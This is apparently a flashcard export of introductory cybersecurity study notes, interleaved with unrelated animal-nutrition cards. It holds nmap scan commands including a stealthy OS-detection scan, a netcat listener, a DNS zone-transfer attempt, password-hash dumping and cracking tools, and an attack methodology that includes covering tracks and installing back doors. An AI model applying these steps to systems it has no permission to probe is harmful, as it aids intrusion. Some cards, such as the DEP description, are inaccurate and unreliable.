- An attack is any type of offensive maneuver that targets information assets, computing assets, computer infrastructures, computer resources, etc. - A cyber attack could be employed by nations, states, individuals, groups, society or organizations. - A cyber attack may originate from an anonymous source. - An attack has an implicit concept of "intent". - Router mis-configuration or a server crash can also cause loss of availability, but they are not attacks.
Phospholipids
-function in cell membranes, etc. -glycerol, 2 fatty acids, other
threat
- A threat is a potential violation of security mechanisms or an undesirable event that may be malicious. - A threat is an intention to inflict harm, damage, or other hostile/unauthorized action on someone's assets. - A person or an entity is likely to pose threats to assets.
What are the benefits of digital signatures?
- Authentication of message sender - Some assurance of message integrity - Non-repudiation (third party can decide if a specific party signed a message)
Non-repudiation for accountability
- Authorized users cannot deny actions (received a message, sent a message)
Vulnerability
- A vulnerability is a weakness in the systems which can be exploited by a Threat Actor, such as an attacker, to perform hostile/unauthorized actions such as attacks. - To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can be used.
Mixed Triglyceride:
-palmitate (16:0) -oleate (18:1) -stearate (18:0)
[9.1] Before encrypted messages can be sent, each communicating party must have a copy of the secret key. How can this key be distributed securely if asymmetric ciphers are NOT used?
- Over a different secure channel - Through a trusted 3rd party = role of key server
Iodine Value
= grams of Iodine absorbed per 100 g of oil. Measure of the # of double bonds.
Methods of DoS Attacks
- Overload the resource so it cannot respond to legitimate requests. - Damage the resource so it cannot be used. - Deliberately interrupt communications between users and resource so it cannot be accessed.
How do botnets work?
- Botnets spread through viruses and worms • Once installed on the victim's computer, they use the internet to make contact with a controller computer • The infected computer (often called a zombie) will do nothing more except periodically check for instructions from the controller computer • Over time, more and more computers are recruited to the incipient botnet until it may contain tens of thousands of zombies • These zombies don't raise suspicion as they appear to be doing nothing • The controller computer will issue a command for the botnet to wake up and begin doing something • Often the people who created the botnet have either sold or rented it to another group who want to use its capabilities.
Types of Authentication: - Multifactor Authentication
- Can Consist of Two, Three, Any Number of Factors - Example: An ID / Password and a Smartcard is a Two Factor Authentication
Ophcrack
- Can be Installed on a Bootable CD - If used in that Manner, you boot the System to the CD, thus Circumventing Windows Security, and proceed to Try to Crack the Passwords - Ophcrack offers a small Rainbow Table free of Charge
Defense against DDoS
- Cloud hosting - Coordination with upstream providers.
tracert
- Command is tracert in Windows and traceroute in Linux - tracert or traceroute tells you how to get there
Ping
- Part of Both Windows and Linux - The Ping Utility is used to Find out if a Particular Website is Reachable - Ping Operates by Sending Internet Control Message Protocol (ICMP) Echo Request Packets to the Target Host and Waits for an ICMP Response
[1.2] Which security goals are compromised if the attacks described in the article are performed on a Jeep?
- Confidentiality: cellular network traffic reveals vulnerable vehicle, track GPS, trace route over time, measure speed, monitor in car systems etc. - Integrity: changes made to firmware to insert the code that allows for the remote control. - Availability: can take control away from authorised user.
[4.6] Google drive etc. Does the system use discretionary, mandatory, or role-based access control, or a combination of these?
- DAC.
General Networking Tools
- Data Sanitization Tools - Backup Utilities - Banner Grabbing
Troubleshooting Common Security Issues: - Common Configuration Issues (Default Passwords)
- Default Passwords must be Changed Immediately
Disruption/Usurpation
- Denial of service • A long-term inhibition of service, is a form of usurpation, although it is often used with other mechanisms to deceive. • The attacker prevents a server from providing a service.
Troubleshooting Common Security Issues: - Digital Certificate Issues
- Digital Certificates also must be Configured and Implemented Properly - Issue Certificates in a Secure Manner (Use Proper Key Size, Key is Stored Securely) - It is better to have an Organizational Certificate Authority Issue Certificates
What are the major access control approaches?
- Discretionary Access Control (DAC) - Mandatory Access Control (MAC) - Role Based Access Control (RBAC) Can use a combination.
ARP Flags: -a
- Displays all of the Current arp entries
ARP Flags: -g
- Displays all the Current arp entries for all Interfaces. Same as -a
Troubleshooting Common Security Issues: - Other Issues
- Don't allow Unlicensed Software Installation - Comply with Copyright Laws - Restrict (SMS: Short Message Service, MMS: Multimedia Messaging Service)
Kerberos: - Use Explained (2)
- Each Time the User Wishes to Access some Resource on the Network, the User's Computer presents KDC with the TGT - The TGT then Sends that User's Computer a Service Ticket, granting the User Access to that Service - Service Tickets are usually only good for up to 5 minutes - The User's Computer then sends the Service Ticket to the Server the User is trying to Access - As a Final Authentication Check, that Server then Communicates with the TGT to Confirm and Validate the Service Ticket
Process of decryption for Vernam OTP
- Each character = 8bit string - The decryption key = encryption key. - Decryption algorithm is XOR. - Each character has different 8 bit string (key portion) - For whole message, key length must = length of plaintext. RANDOMNESS is what provides the security
Asymmetric Ciphers (Public Key Cipher)
- Encryption key DOES NOT EQUAL decryption key - Computationally infeasible to derive one key from the other
Network Scanners Can:
- Enumerate everything on a Network - Detect Rogue Systems
[3.4] Name things attackers can do to multi-functional photocopiers.
- Execute unauthorised code. - DoS attacks. - Attacker requires remote unauthenticated access.
Other Security Technologies:
- File Integrity Checking - Application Whitelist - Unified Threat Management (UTM) System - Data Loss Prevention (DLP) Software - Data Execution Prevention (DEP)
[3.4] Describe a threat to multi-functional printers.
- Files sent to printer can be viewed, copied, redirected, modified and re-transmitted. - Confidentiality breach may occur - Integrity breach may occur. - Possible to cancel or delete files before printed.
nmap
- Free Download for Windows/Linux - It is a Port Scanner - It can Reveal what Services are Running - It Can Reveal Target Machine's OS - Can Scan: A Range of IP Addresses or A Single IP Address
Pwdump
- Get a Copy of the Local Password Hashes from the Windows SAM File - The SAM File, or Security Accounts Manager, is where Windows stores Hashes of Passwords. The Program Pwdump will extract the Password Hashes from the SAM File
Active Attacks
- Goal is to modify, replicate or fabricate. - Can detect and try to recover e.g. phishing, DoS, Man-in-the-middle
Passive Attacks
- Goal is to obtain information - Difficult to detect e.g. eavesdropping, shoulder surfing.
Network Scanner (Network Mapper)
- Help you Find out what is on your Network
Security Technologies
- IDS - Antimalware - Firewalls - Other Systems
Identity and Access Management Concepts:
- Identification means finding out who Someone is - Authentication is a Mechanism of Verifying that Identification - Put another way, Identification is Claiming an Identity - Authentication is Proving it
[3.1] Difference between passive and active attacks
- Passive = attacker does not interact with the asset, difficult to detect. - Active = attacker takes some action to interact with asset, if you monitor you can detect.
Macro Virus
A computer virus that is written in a scripting language known as a macro.
Example of Masquerading or spoofing
- If a user tries to log into a computer across the Internet but instead reaches another computer that claims to be the desired one, the user has been spoofed. - Similarly, if a user tries to read a file, but an attacker has arranged for the user to be given a different file, another spoof has taken place.
Program Virus
A computer virus that infects executable program files.
Summary: Fat in Animal Nutrition
"Fat" usually refers to triglycerides • Fat is added to diets as an energy source, for palatability, to decrease dust • Fat is energy dense • Animals fed diets with added fat generally have greater carcass fat • Feeding unsaturated fat to non-ruminants results in unsaturated fat being deposited in the carcass
Use Password Crackers on your Network:
- If you are able to Crack one or more Passwords - You are then Aware of this Security Vulnerability and can take Appropriate Steps to Remedy the Issue
Vulnerability Scanners: Passive Scanners
- Involves Methods to Search your Network that do not Directly Interact with the Network
Known Initialisation Vector (IV)
- Is public - Prevents repetition of data
Troubleshooting Common Security Issues: - Common Configuration Issues (Failure to Patch Network)
- Items such as: Firewalls, Access Points, Switches, and Routers - All have an OS that must be Patched, just as you Patch your Computers
Stream Ciphers
- Plaintext & ciphertext are streams of characters Process: - Plaintext encrypted one character at a time by combining with a keystream - Ciphertext decrypted one character at a time by combining with the same keystream used for encryption
Kerberos: - In Depth
- Kerberos Authentication uses a Key Distribution Center (KDC) to Orchestrate the Process - The KDC Authenticates the Principal (which can be a User, Program, or System) and Provides it with a Ticket - After this Ticket is issued, it can be used to Authenticate against other Principals - This process occurs automatically when another Principal performs a Request or Service
RSA Signatures
- Key generated same way as RSA encryption
[4.3] To what extent can mandatory access control (MAC) be used to implement the need to know principle?
- Limited ability to implement need to know. - Typical MAC rules use user clearances and object classification based on hierarchical levels. A user who fits such a rule will have access regardless of whether that user has a current need to access the data or not.
Other Security Technologies: - Application Whitelisting
- List of Applications that are Allowed on a Given Computer or Network - They Log Attempts to Install Unauthorized Applications - You are not Allowed to Install a Password Checker
nc -l -p 12345
- Listen on Port 12345
ARP Flags: -N
- Lists arp cache for a Specified Interface
MBSA (Microsoft Baseline Security Analyzer)
- MBSA is not the Most Robust Vulnerability Scanner - It is Free - It Finds Vulnerabilities and Configuration Issues - Very Easy to Use
SSH security properties
- Message confidentiality - Message integrity - Message Replay protection: money transfer example. - Peer Authentication.
CLA Applications in Non-ruminants (pigs, poultry, fish)
"Value-added" foods with human health benefit • Repartitioning effect • Health benefit to the animal
malware
"malicious software" & includes any software designed to damage, corrupt, or illegally manipulate computer resources
Other Security Technologies: - Data Execution Prevention (DEP)
- Microsoft Introduced this with Windows Vista - When an Application tries to Launch, the User must approve the Execution before it can Proceed - Some DEP Systems Log any time an Application tried to Execute, even if it was Blocked - Even if the Malware is Blocked, You would want to Know that there was an Attempt to Execute
Binary Additive One-time pad (Vernam OTP)
- Plaintext is a stream of bits - Key is a stream of bits - XOR of plaintext and key to produce ciphertext - XOR of ciphertext and key to recover plaintext - Can not reuse or repeat keys, each message requires a NEW random key.
Ipconfig (Windows) / Ifconfig (Linux)
- Provides Information about your Network Interfaces
OWASP Zap (Open Web Application Security Project Zap)
- Publish a List of the Top Vulnerabilities - Also Publish a Free Tool to Scan for Website Vulnerabilities - Easy to Use
Tools Commonly used for Password Cracking:
- Pwdump - Ophcrack
Remote Authentication Dial-in User Services (RADIUS)
- RADIUS allows Authentication of Remote and other Network Connections - A RADIUS Server can be managed centrally, and the Servers that allow access to a Network can Verify with a RADIUS Server whether an Incoming Caller is Authorized - In a Large Network, with many Connections, this Allows a Single Server to Perform all Authentications
Password checking strategies
- Reactive password checking - Proactive password checking (as they create it)
Advantages of Knowledge-based authentication mechanisms e.g. passwords
- Readily accepted by users - Low cost implementation
Troubleshooting Common Security Issues: - Access Issues
- Recommended Password Selection Policy - Password Storage Policy (done by OS) - Least Privilege - Use Good Protocols such as Kerberos - Strong Authentication
People need to consider
- Recruiting - Monitoring - Education
Ipconfig / Ifconfig Flags: /release
- Releases any Dynamically Assigned IP Addresses
(Property) ICT hardware and software need to consider
- Reliability and robustness - Redundancy - Source of software: authorised, legit, supported - Testing - Configuration/misconfiguration - Unprotected communication channels: wired/wireless
ElGamal Cryptosystem
- Relies on difficulty of discrete logarithms for security - Used for encryption Ciphertext is: - twice length of plaintext --> C = 2P - randomised = multiple encryptions of same plaintext to produce different ciphertexts
ARP Flags: -d
- Removes a Listing from the arp cache
Ipconfig / Ifconfig Flags: /renew
- Renews the Dynamically Assigned IP Addresses
Disadvantages of clock based
- Requires synchronization - When used over a network, must allow for network delays, which gives an attacker a window to copy the password and log in as the user.
For effective access control what do you need to consider?
- Resources - Sensitivity - Who/what should have access to each resource? - Permissions (Authorisations) - How will access control decisions be made? - Policy implementation
Security Technologies: - Firewalls
- Review the Firewall Logs on a Regular Basis - Windows Firewall Log is located at: (%windir%\system32\LogFiles\Firewall\) - Turn on Logging - Open the Windows Firewall Console: (wf.msc and choose Actions > Properties) - Click Logging
RSA Cryptosystem
- Rivest-Shamir-Adleman cryptosystem - Use for encryption and digital signature scheme - Based on factorising large integers
nmap 192.168.1
- Scan IP Address 192.168.1
nmap 192.168.1.1-20
- Scan a Range of IP Addresses
nmap -O -PT -T1 192.168.1.1
- Scan to Detect OS, use TCP Scan, and use Sneaky Speed
Ipconfig / Ifconfig Flags: /all
- Shows all Information for all Network Interfaces
Types of Authentication:
- Single Factor - Multifactor - Biometric - Federations
What is disclosure?
- Snooping • Is unauthorized access to or interception of information • The practice is similar to eavesdropping but is not limited to gaining access to data • Can be unauthorized observance of data that belongs to someone else. • The unauthorized interception of information, is a form of disclosure. • It is passive, suggesting simply that some entity is listening to (or reading) communications or browsing through files or system information. • Wiretapping, or passive wiretapping, is a form of snooping in which a network is monitored.
[1.2] How can you address the security problems of Jeep Cherokee example?
- Software patches to address the vulnerability - During dev. implement a policy re: separate critical vehicle systems from entertainment/phone systems. - Education/training/awareness
[1.3] Why is the continued use of Windows XP after April 2014 considered a vulnerability?
- Software will no longer be patched = no repair of code errors. - Flaws identified by criminals can be used to attack system.
Authentication Systems or Methods are Based on One or More of these Five Factors:
- Something you know, such as a Password or PIN (Type I) - Something you have, such as a Smartcard, Token, or Identification Device (Type II) - Something you are, such as your Fingerprints, or Retinal Pattern (Biometrics) (Type III) - Something you do, such as an Action you must take to complete Authentication - Somewhere you are (This is based on Geolocation)
Who is the Commonwealth Privacy Act 1988 NOT applied to?
- State or Northern Territory government agencies - Non-government organisations.
What are block ciphers?
- Symmetric ciphers - Encrypted/Decrypted one block at a time - Blocks commonly 64-bits or 128-bits
Common Types of Protocol Analyzers:
- Tcpdump - Wireshark
Aircrack
- The Most Popular Tool - Free to Download - There are a Few Tools in the Download: wzcook.exe (will try to extract wireless data including the password, from the local machine on which it is installed; it is a command line tool)
Risk control is the examination and documenting of the security posture of an organization's information technology and the risks it faces.
False
There are four stages in a worm attack:
- The first stage is when the worm probes other machines looking for a vulnerability that can be exploited to copy itself to - The second stage is to penetrate the vulnerable machine by performing the operations for exploiting the vulnerability. • For example, the worm might detect an open network connection, through which it can get the remote machine to execute arbitrary instructions. - In the third stage, the worm will download itself to the remote machine, and store itself there. This is often called the 'persist' stage. - In the fourth stage, the worm will propagate itself by picking new machines to attempt to probe.
Importance of Cyber Security
- The internet allows an attacker to work from anywhere on the planet. - Risks caused by poor security knowledge and practice: Identity Theft, Monetary Theft, Legal Ramifications (for yourself and your organization), Sanctions or termination if policies are not followed. - According to the SANS Institute, the top vectors for vulnerabilities available to a cyber criminal are: *Web Browser *Instant Messaging (IM) Clients #Instant messaging (IM) technology is a type of online chat that offers real-time text transmission over the Internet #WhatsApp, Viber, etc. *Web Applications *Excessive User Rights *Social media.
netstat
- The netstat Command is also a Part of Both Windows and Linux - Displays Current Network Connections
Netcraft.com
- This Provides Information about Websites including what OS they are running
Shodan.io
- This Site is a Vulnerability Search Engine - You can Search your own Network's Domain Name for Vulnerability
isc.sans.edu
- This is the SANS Institute Cyber Storm Center - Will Provide Information on Current Cyber Threats
Other Security Technologies: - File Integrity Checking
- Tripwire is a File and Directory Integrity Checker - Monitors a Designated Set of Files for any Changes - Used with System Files on a Regular Basis - Tripwire can Notify System Administrators of Corrupted or Tampered Files - Traditionally an Open Source Tool, but now also Commercial; an Open Source Version is still available Free
Digital Signatures
- Unique to signer - Verifiable - Legally binding - Different for every document - Must be produced and verified by a machine Completely different to digitized signature
[4.3] Explain how role-based access control (RBAC) can be used to implement separation of duties.
- User can only take one role at a time. - Require users in 2 different roles to complete task, set access permissions of different roles to force separation.
Types of Authentication: - SFA (Single Factor Authentication)
- Username / Password Combination
Elliptic Curve Cryptography
- Uses algebraic group defined on a set of points on an elliptic curve
nslookup
- Verifies that the Machine can connect to the DNS Server - Then it Opens a Command Prompt wherein you can enter DNS-Related Commands - run: nslookup.exe, then ls -d domain_name - A Zone Transfer is when you Attempt to get the DNS Server to Send you all of its Zone Information - A Properly Configured DNS Server will Refuse
[3.1] Difference between vulnerabilities and threats
- Vulnerabilities = weaknesses in system protecting asset. - Threats = anything with potential to cause harm.
Vulnerability Scanners
- Vulnerability Scanners find and correct Vulnerabilities before an attacker finds them - Some Tools scan for General Vulnerabilities - Others Scan for WebPage Vulnerabilities, Configuration Vulnerabilities
Kerberos: - Use Explained (1)
- When using Kerberos, the User Authenticates to the KDC and is given a Ticket granting Ticket (TGT) - This Ticket is encrypted and has a Time Limit of Up to 10 Hours - The Ticket Lists the Privileges of that User (Much like a Token)
Vulnerability Scanners: Active Scanners
- Will Interact Directly with the Target Network - Nessus, MBSA, and OWASP ZAP
Troubleshooting Common Security Issues: - Common Configuration Issues (Limit Admin Access)
- Wireless Access Points have an Administrative Panel - This should be Accessible via a Physical Connection, not via Wireless
The majority of virus programs are designed to harm users, by
- corrupting their data or attacking the operating system itself, - providing an exploitable 'backdoor', giving attackers access to the computer.
Separation of duties (privileges)
- divide task up into series of steps - ensure steps performed by different entities - More than one entity is required to complete the task
Benefit of separation of duties
- no single entity is authorised to complete all steps in a critical task - Minimises error - harder for insiders to abuse
Possible access permissions that could be implemented?
- read (observe) - write (observe and alter) - execute (neither observe nor alter) - append (alter) - search
--------------------------------INCOMPLETE (slide 42)
----------------------------------------------
ASYMMETRIC---------------------------------------------
----------------------------------------------
Symmetric---------------------------------------------------------
--------------------------------------------------------------
Essential Nutrients
-All organisms require water. -Essential nutrients for animals are: •the energy sources •some of the amino acids •a subset of fatty acids •vitamins •certain minerals
Diethylstilbestrol - DES
-Synthetic estrogen used to prevent miscarriages in humans (1947) -found to be a carcinogen (1971) -Also used as a growth promotant in cattle (banned in 1979) -Human dose 1-5 mg/d -Beef tissue levels 10 ppb (10 μg / kg)
Cholesterol is a steroid
-critical for cell membranes -fat digestion-lipid transport -derivatives have essential functions in metabolism
Phishing: Counterfeit Email
• A seemingly trustworthy entity asks for sensitive information such as credit card numbers, login IDs, password, date of birth, via e-mail. • A criminal activity using social engineering techniques. • An attempt to acquire sensitive data, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. • Typically carried out using email or an instant message.
trust
• One party (trustor) is willing to rely on the actions of another party (trustee) • The trustor (voluntarily or forcedly) abandons control over the actions performed by the trustee. • As a consequence, the trustor is uncertain about the outcome of the other's actions • The uncertainty involves the risk of failure or harm to the trustor if the trustee does not behave as expected. • Trust means an act of faith; confidence and reliance in something that's expected to behave or deliver as promised. • It is a belief in the competence and expertise of others, such that you feel you can reasonably rely on them to care for your needs • We trust a system less if it gives us insufficient information about its expertise. • We trust a system less when we don't have much control over our assets.
Spoofing examples
• Spammers can attack a mail system by changing the information stored in email 'envelopes' which enclose the messages themselves. • This is known as 'spoofing' and allows a spammer to disguise their actual address by writing new addresses for the sender (such as replacing their own address with that of TrustedBank) and the destination for receipts. • Simple spoofing is now being challenged by technologies that allow genuine senders to authenticate messages, which can be checked by the recipient's mail server. • Internet service providers and companies have to buy far more bandwidth and storage than they will ever need for legitimate purposes.
Units
1 calorie (small "c") = heat to raise the temp. of 1 gram of water by 1°C. 1000 calories = 1 kilocalorie (kcal) (Calorie, large "C" = 1 kcal). Joule = the energy transferred to an object when a force of one newton acts on that object through a distance of one meter (1 newton metre or N·m), or the energy dissipated as heat when an electric current of one ampere passes through a resistance of one ohm for one second. 1 cal = 4.18 joules; 1 joule = 0.239 cal. BTU = the amount of heat required to raise the temperature of one pound of water through 1°F (58.5°F to 59.5°F) at sea level (30 inches of mercury)
3 Information security goals
1. Confidentiality 2. Integrity 3. Availability
Privacy Amendment (Enhancing Privacy Protection) Act 2012 has 13 Privacy Principles grouped into 5 parts. What are they?
1. Consideration of personal information privacy 2. Collection of personal information 3. Dealing with personal information 4. Integrity of personal information 5. Access to, and correction of, personal information
Remote SW attacks without User Action
1. DOS attack 2. DDOS attack
How do Asymmetric ciphers for confidentiality work?
1. Each user creates a public key / private key pair. 2. Public key shared with everyone. 3. Sender uses receiver's public key to encrypt message. 4. Ciphertext sent to receiver. 5. Receiver decrypts ciphertext using their private key.
[5.1] Briefly describe the problems associated with reusable passwords.
1. Easy to share 2. Easy to forget 3. Users choose easy to guess passwords 4. Can't be written down 5. Don't provide non-repudiation
Types of Block ciphers
1. Electronic Code Book mode (ECB) a. Data Encryption Standard (DES) b. Advanced Encryption Standard (AES) 2. Cipher Block Chaining (CBC) 3. Output Feedback (OFB) 4. Cipher Feedback (CFB) 5. Galois Counter Mode (GCM) There are 12. We are concerned with ECB and CBC.
2 types of Authentication
1. Entity Authentication 2. Data origin authentication
Source of threats
1. External: unauthorized entities outside organisation. 2. Internal: authoris
Attacking the Network Methodology
1. Footprint 2. Scan 3. Enumerate 4. Penetrate 5. Attack 6. Cover Tracks 7. Install back doors
[4.4] Policy enforcement phase. Explain these three steps in the order they must occur.
1. Identification (requester claims an identity) 2. Authentication (verify requester) 3. Verification authorisation (check identity authorised)
What are the steps for implementing access control?
1. Identify the subject (who are you claiming to be?) 2. Authenticate the subject (evidence) 3. Verify that the subject is authorized for the requested mode of access before allowing access
What are the 3 sides of the Security Model? What is on each side?
1. Information States (top) • Transmission • Storage • Processing 2. Critical Information Security Services (left) • Confidentiality • Integrity • Availability 3. Security Measures (right) • Technology • Policy & Practices • Education, Training and Awareness
Authenticator Categories
1. Knowledge-Based (something you know) 2. Object-based (something you do) 3. ID-based (something you are) 4. Location-based (somewhere you are)
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a ransom to be able to decrypt their files. Explain what happens after the CryptoLocker malware is installed.
1. Malware contacts a control server which generates a 2048-bit RSA public/private key pair. 2. Control server sends public key to victim's computer and keeps private key. 3. Malware encrypts files on computer using public key. 4. When enough files are encrypted it displays message asking user to pay ransom.
2 Types of Attacks
1. Passive 2. Active
[5.7] Describe the 3 practical aspects that need to be considered for implementing a biometric system.
1. Performance: accuracy + speed 2. Acceptability: extent people accept the use of the biometric identifier. 3. Circumvention: how easily system is fooled using fraudulent efforts.
Process of encryption for Vernam OTP
1. Plaintext encrypted character by character. 2. Each character converted to ASCII 8-bit binary string (encoding). 3. Encryption key for the first character is an 8-bit secret string. Encryption algorithm is XOR. 8-bit ciphertext string is also an ASCII symbol
What are the two phases of implementing access control?
1. Policy definition phase: where privilege is allocated and administered a) Authorise subject by defining the AC policy b) Distribute access credentials/token to subject c) Change/revoke authorisation whenever necessary 2. Policy enforcement (grant access) phase: where privilege is required to gain access a) Authenticate subject b) Grant access as authorised by policy c) Monitor access
3 Types of Countermeasures
1. Preventative controls 2. Detective controls 3. Corrective controls
Types of Assets
1. Property - Physical assets e.g. buildings and contents - Hardware - Software (OS, apps, support systems) - Data 2. People - Employees - Contractors - Customers/Clients 3. Procedures
How are public keys distributed?
1. Provided directly e.g. in email signature 2. On a website 3. Public keyserver
What are the most common digital signature schemes?
1. RSA 2. DSA 3. ECDSA
Two inputs used for most modern stream ciphers
1. Secret key 2. IV (Known Initialisation Vector)
[5.6] Describe 4 main biometric modules
1. Sensor module: captures biometric signal e.g. fingerprint scanner. 2. Feature extraction module: processes signal and extracts discriminatory features e.g. position of ridges on fingers. 3. Matcher module: compares against stored templates to generate a matching score. 4. System database module: used to store biometric templates.
What are the advantages of Elliptic Curve Cryptography over other asymmetric cryptographies?
1. Smaller key size and smaller ciphertext size than RSA 2. Provides same level of security with smaller keys
Asset States
1. Storage - electronic, physical, human 2. Transmission - physical or electronic 3. Processing (use) - physical or electronic
What does the security of asymmetric cryptographic system depend on?
1. Strength of the algorithm 2. Key Size 3. Confidentiality of the private key (K_priv)
Issues with Binary Additive Stream Ciphers
1. Synchronisation: decryption keystream must be synchronised with encryption keystream. 2. Bitflip error: one bit will be decrypted incorrectly 3. Inserted/deleted bit: loss of synchronisation = message can't be recovered from insertion/deletion point.
Why is access control used?
1. To prevent unauthorized users from gaining access to resources. 2. To prevent authorised users from misusing resources.
Attacks by Programmer Developing a System
1. Trojan horse: hides in other programs, revealed when activated 2. Back door or trap door: usually a password that allows you to bypass security 3. Logic Bomb: segment of computer code embedded and designed to activate at a certain time
[5.7] In order to be used for biometrics a characteristic must meet 4 requirements.
1. Universality: each person should have the characteristic. 2. Distinctiveness: characteristic should be significantly different between each person. 3. Permanence: characteristic should be sufficiently invariant over a period of time. 4. Collectability: characteristic should be measured quantitatively.
[5.2] Explain how authentication is performed for hashed passwords.
1. User sends UserID and password 2. Server computes hash value of received password 3. Look up record for that UserID, a. Compare computed hash value with stored hash value b. If they match, access is permitted
Remote SW attacks Requiring User Action
1. Virus: segment of code that performs malicious actions by attaching to another program. 2. Worm: same as a virus but can replicate itself without requiring another computer program. 3. Phishing attack (and spear phishing).
risk analysis steps
1. Assess the value of each asset. 2. Estimate the probability that each asset will be compromised. 3. Compare the cost of the asset being compromised to the cost of protecting the asset.
Attacking a web server
1. identify all entry points 2. examine the structure of entry points 3. Are there non-HTTP ways of communicating with the server 4. identify server software 5. enumerate 6. research for known vulnerabilities
Risk mitigation
1. Implement controls to prevent identified threats from occurring. 2. Develop means of recovery. Methods: acceptance, limitation and transference.
[9.1] How many keys are required for five people to communicate confidentially using a symmetric cipher, such that any two can communicate securely?
10. Person A needs 4 keys to communicate with the others. There are 5 people --> 5 x 4 = 20. But the key Person B uses to communicate with Person A is the same so --> 20/2 = 10.
The Children's Online Privacy Protection Act (COPPA) restricts the collection of information online from children. What is the cutoff age for COPPA regulation?
13
Unsaturated Fatty Acids -all "cis"
16 Carbons: Palmitate 16:0, melting point 63; Palmitoleic 16:1, melting point 1.5. 18 Carbons: Stearate 18:0, melting point 71.5; Oleic 18:1, melting point 16.3; Linoleic 18:2, melting point -5.0; Linolenic 18:3, melting point -11. 20 Carbons: Arachidic (eicosanoic) 20:0, melting point 75.5; Gadoleic 20:1, melting point 25; Arachidonic (eicosatetraenoic) 20:4, melting point -49.5. Adding double bonds decreases the melting point (solid → liquid).
Common Long Chain Fatty Acids
16:0 Palmitic acid; 18:0 Stearic acid; 18:1 n-9 Oleic acid; 18:2 n-6 Linoleic acid; 18:3 n-3 α-Linolenic acid Δ9,12,15; 18:3 n-6 γ-Linolenic acid Δ6,9,12; 20:4 n-6 Arachidonic acid; 20:5 n-3 Eicosapentaenoic acid (EPA); 22:6 n-3 Docosahexaenoic acid (DHA)
who are the individuals that are hit hard by ID theft?
18 & 19 year olds
Discovery of CLA
1961: First report that CLA was an intermediate in microbial biohydrogenation in the rumen. 1979: A compound in fresh and fried ground beef that was anti-mutagenic in the Ames test. 1985: The mutagenesis inhibitor was an anticarcinogen in mice. 1987: The anticarcinogen was CLA. 1990's: synthetic CLA produced. 1997+ Synthetic CLA reduced body fat in mice, rats, pigs, etc...
[7.2] What port is reserved for HTTP over TLS? What is the prefix for a URL that describes a resource accessible by HTTP over TLS?
443. https://
Bob is using a port scanner to identify open ports on a server in his environment. He is scanning a web server that uses Hypertext Transfer Protocol (HTTP). Which port should Bob expect to be open to support this service?
80
Whaling
A Phishing attack that targets only wealthy individuals.
What does Call forwarding look like?
A cybercriminal gets the phone company to forward our client's cell number to their cell phone so they can impersonate our client when we, or any other financial institution our client conducts business with, calls them back for verification before transferring funds or opening accounts.
b. verify the receiver
A digital signature can provide each of the following benefits EXCEPT _____________. a. prove the integrity of the message b. verify the receiver c. verify the sender d. enforce nonrepudiation
Hoax
A false warning designed to trick users into changing security settings on their computer.
unsaturated fatty acid
A fatty acid possessing one or more double bonds between the carbons in the hydrocarbon tail Typically methylene-interrupted 20:5 Δ 5, 8, 11, 14, 17 20:5 omega 3
Spyware
A general term used to describe software that spies on users by gathering information without consent.
[6.1] According to Section 6 of the Australian Privacy Act 1988, what is not a record?
A generally available publication or anything kept in library, art gallery, museum for purposes of reference, study or exhibition. Records in care of National Archives of Aust., documents in Aust. War Memorial collection, letters/articles in transmission by post.
Botnet
A logical computer network of zombies under the control of an attacker.
Watering Hole Attack
A malicious attack that is directed toward a small group of specific individuals who visit the same website.
Worm
A malicious program designed to enter a computer via a network to take advantage of a vulnerability in an application or an operating system.
Pharming
A phishing attack that automatically redirects the user to a fake site.
Spear Phishing
A phishing attack that targets only specific users.
Vishing
A phishing attack that uses telephone calls instead of emails.
Rootkit
A set of software tools used by an attacker to hide the actions or presence of other types of malicious software.
Information Security Incident
A single or a series of unwanted or unexpected information security events that have a significant probability of compromising business operations and threatening information security.
Impersonation
A social engineering attack that involves masquerading as a real or fictitious character and then playing out the role of that person on a victim.
Adware
A software program that delivers advertising content in a manner that is unexpected and unwanted by the user.
Total Digestible Nutrients (TDN)
A standard evaluation of the nutritional merit of a particular feed for farm animals which includes all the digestible organic nutrients: protein, fiber, nitrogen-free extract, and lipids. "An outmoded method of expressing the energy value of a feed", used mainly in horse, beef and dairy nutrition. TDN = digestible crude protein + digestible NFE + digestible crude fiber + 2.25 x digestible ether extract. TDN is expressed as a percentage of the ration, or as lbs or kg of TDN (not as a caloric value).
Threat Model
A threat model is a diagram and description that tells a story of how an attacker could exploit the vulnerability. This is a narrative approach to the attack that should help guide the mitigation techniques that need to be put in place to protect the system at that point. It can define the security of an application and reduces the number of vulnerabilities. It also has the 2 steps of identifying and prioritizing the vulnerabilities. Assumptions about the adversary: capability of the adversary, knowledge of the adversary, ... Assumptions about the legitimate users: they choose strong passwords, will not send their password in email, ... Assumptions about the certificate authorities: they are trustworthy, perfectly secure, ...
Spim
A variation of spam, which targets instant messaging users instead of email users.
How does heuristic detection detect a Virus
A virtualized environment is created and the code is executed in it
Armored Virus
A virus that goes to great lengths in order to avoid detection.
b. digest
A(n) ______________ is not decrypted but is only used for comparison purposes. a. stream b. digest c. algorithm d. key
What type of controls are the processes for developing and ensuring that policies and procedures are carried out?
Administrative controls
____ is simply how often you expect a specific type of attack to occur.
ARO
The ____ strategy is the choice to do nothing to protect a vulnerability and to accept the outcome of its exploitation.
Accept Control
Discretionary Access Control (DAC)
Access at the discretion of some individual, possibly the information asset owner. - Popular OSes use DAC. - Often implemented using access control lists or matrices.
Which one of the following is the best example of an authorization control?
Access control lists
Blacklists
Access generally permitted unless expressly forbidden. - If your name is on the list you will be denied access. - the sites you are not permitted to visit
Whitelist
Access is generally forbidden unless expressly permitted. - if your name is on the list you will be granted access - the only sites you are permitted to visit.
Role-based access control (RBAC)
Access permissions based on the role of the individual rather than the subject's identity (user, admin, student etc.)
[1.2] Were the Jeep Cherokee attacks active or passive?
Active attacks: constructed code and deliberately inserted it into system.
Subjects
Active entities in the system (for example users, processes, other computers), that cause information to flow among objects or change the system state.
Internet (network) layer
Addressing and routing. Global. - IPv4, IPv6 - ICMP : control - IPsec : security
Transport Layer Security (TLS)
Adds encryption to application protocols. Used extensively on the web and is often referred to in privacy policies as a means of providing confidential web connections. Network security protocol.
[5.4] Describe one major advantage and one major disadvantage for hardware tokens, when compared to standard user-selected passwords.
Advantage: single use (one time) password is secure against password guessing or replay: reusable passwords are not. Disadvantage: problems if synchronisation between token and host is lost, also security issues around possible loss or theft of token.
